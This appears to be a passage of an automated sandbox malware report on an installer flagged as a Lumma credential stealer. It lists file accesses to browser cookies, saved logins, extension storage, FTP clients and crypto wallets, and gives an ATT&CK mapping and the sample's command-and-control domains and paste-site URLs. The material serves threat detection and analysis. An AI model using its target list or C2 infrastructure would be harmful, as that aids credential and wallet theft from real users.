        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: Glow.comBinary or memory string: WIN_81
        Source: Glow.comBinary or memory string: WIN_XP
        Source: Problems.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
        Source: Glow.comBinary or memory string: WIN_XPe
        Source: Glow.comBinary or memory string: WIN_VISTA
        Source: Glow.comBinary or memory string: WIN_7
        Source: Glow.comBinary or memory string: WIN_8
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_00402263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00402263
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_00401C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00401C61
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure2
        Valid Accounts
        21
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        1
        Disable or Modify Tools
        2
        OS Credential Dumping
        2
        System Time Discovery
        Remote Services1
        Archive Collected Data
        1
        Web Service
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        2
        Valid Accounts
        1
        DLL Side-Loading
        11
        Deobfuscate/Decode Files or Information
        21
        Input Capture
        1
        Account Discovery
        Remote Desktop Protocol31
        Data from Local System
        2
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        Logon Script (Windows)2
        Valid Accounts
        2
        Obfuscated Files or Information
        Security Account Manager13
        File and Directory Discovery
        SMB/Windows Admin Shares21
        Input Capture
        11
        Encrypted Channel
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
        Access Token Manipulation
        1
        DLL Side-Loading
        NTDS38
        System Information Discovery
        Distributed Component Object Model3
        Clipboard Data
        3
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
        Process Injection
        11
        Masquerading
        LSA Secrets13
        Security Software Discovery
        SSHKeylogging114
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Valid Accounts
        Cached Domain Credentials121
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
        Virtualization/Sandbox Evasion
        DCSync5
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
        Access Token Manipulation
        Proc Filesystem11
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
        Process Injection
        /etc/passwd and /etc/shadow1
        System Owner/User Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579282 Sample: Full-Setup.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 39 rentry.co 2->39 41 xXgzCMWHdyLHsXMFRfKCaRHugg.xXgzCMWHdyLHsXMFRfKCaRHugg 2->41 43 kitteprincv.click 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Multi AV Scanner detection for submitted file 2->57 61 7 other signatures 2->61 10 Full-Setup.exe 36 2->10         started        signatures3 59 Connects to a pastebin service (likely for C&C) 39->59 process4 process5 12 cmd.exe 3 10->12         started        file6 33 C:\Users\user\AppData\Local\Temp\...behaviorgraphlow.com, PE32 12->33 dropped 63 Drops PE files with a suspicious file extension 12->63 16 Glow.com 1 12->16         started        21 cmd.exe 2 12->21         started        23 conhost.exe 12->23         started        25 7 other processes 12->25 signatures7 process8 dnsIp9 35 kitteprincv.click 104.21.43.127, 443, 49738, 49739 CLOUDFLARENETUS United States 16->35 37 rentry.co 104.26.3.16, 443, 49773 CLOUDFLARENETUS United States 16->37 31 C:\Users\...\4VQOL9Z4BW428506NY343FUN.ps1, HTML 16->31 dropped 45 Query firmware table information (likely to detect VMs) 16->45 47 Tries to harvest and steal ftp login credentials 16->47 49 Tries to harvest and steal browser information (history, passwords, etc) 16->49 51 2 other signatures 16->51 27 powershell.exe 7 16->27         started        file10 signatures11 process12 process13 29 conhost.exe 27->29         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Full-Setup.exe60%VirustotalBrowse
        Full-Setup.exe58%ReversingLabsWin32.Ransomware.LummaC
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\600044\Glow.com0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        rentry.co
        104.26.3.16
        truefalse
          high
          kitteprincv.click
          104.21.43.127
          truetrue
            unknown
            xXgzCMWHdyLHsXMFRfKCaRHugg.xXgzCMWHdyLHsXMFRfKCaRHugg
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              sordid-snaked.cyoufalse
                high
                deafeninggeh.bizfalse
                  high
                  diffuculttan.xyzfalse
                    high
                    effecterectz.xyzfalse
                      high
                      wrathful-jammy.cyoufalse
                        high
                        https://rentry.co/feouewe5/rawfalse
                          high
                          awake-weaves.cyoufalse
                            high
                            immureprech.bizfalse
                              high
                              kitteprincv.clicktrue
                                unknown
                                debonairnukk.xyzfalse
                                  high
                                  https://kitteprincv.click/apitrue
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabGlow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.microvrpowershell.exe, 0000000F.00000002.2394229441.0000000003066000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://rentry.co/whathZpowershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://rentry.co/hZpowershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Glow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215604698.0000000001775000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.autoitscript.com/autoit3/Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drfalse
                                                      high
                                                      https://kitteprincv.click:443/apiGlow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://aka.ms/pscore6lBpowershell.exe, 0000000F.00000002.2395086529.0000000004E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiGlow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://rentry.co/static/icons/512.pnghZpowershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.00000000051EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.c.lencr.org/0Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.i.lencr.org/0Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallGlow.com, 0000000A.00000003.2215604698.0000000001750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchGlow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://rentry.co/whatpowershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp, 4VQOL9Z4BW428506NY343FUN.ps1.10.drfalse
                                                                        high
                                                                        https://rentry.co:443/feouewe5/rawGlow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.mozilla.org/products/firefoxgro.allGlow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.2395086529.0000000004E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Glow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://kitteprincv.click:443/apiH111H65H70H121H113H109H98H111H98H117H106H112H111H65H66H101H119H102HGlow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://kitteprincv.click/api1)Glow.com, 0000000A.00000002.2492595373.0000000001388000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgGlow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoGlow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://rentry.co/static/icons/512.png4VQOL9Z4BW428506NY343FUN.ps1.10.drfalse
                                                                                          high
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaGlow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.autoitscript.com/autoit3/XGlow.com, 0000000A.00000000.1729969732.0000000000455000.00000002.00000001.01000000.00000006.sdmp, Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Problems.0.drfalse
                                                                                                  high
                                                                                                  http://ocsp.rootca1.amazontrust.com0:Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Glow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215604698.0000000001775000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorFull-Setup.exefalse
                                                                                                        high
                                                                                                        https://www.ecosia.org/newtab/Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brGlow.com, 0000000A.00000003.2262531789.0000000005B65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
